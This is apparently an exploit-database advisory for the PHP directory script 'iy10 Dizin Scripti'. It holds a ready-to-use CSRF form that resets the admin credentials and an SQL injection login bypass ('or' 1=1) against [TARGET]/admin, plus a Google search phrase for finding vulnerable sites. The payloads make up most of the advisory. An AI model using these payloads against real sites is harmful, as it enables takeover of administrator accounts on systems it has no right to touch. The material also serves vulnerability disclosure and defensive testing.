iy10 Dizin Scripti - Multiple Vulnerabilities
Author: KnocKout
type: webapps
platform: php
port: 80.0
date_added: 2015-12-10
date_updated: 2016-10-10
verified: 1
codes: OSVDB-132329;OSVDB-132328
tags:
aliases:
screenshot_url:
application_url:
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
iy10 Dizin Scripti => Multiple Vulnerabilities (CSRF & Authentication Bypass)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Åžeker Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : iy10 Dizin Scripti
|~Affected Version : All Version
|~Software : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
|~RISK : High
|~Google Keyword : "Sitenizi dizine eklemek için tıklayın !"
################## ++ CSRF Admin Password Change Exploit ++ ######################################
<html>
<body>
<form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
<input type="hidden" name="kullaniciadi" value="knockout" />
<input type="hidden" name="sifre" value="password" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
################# ++ SQL Injection with Authentication Bypass ++###########################################
http://[TARGET]/admin
ID: 'or' 1=1
PW : 'or' 1=1
############################################################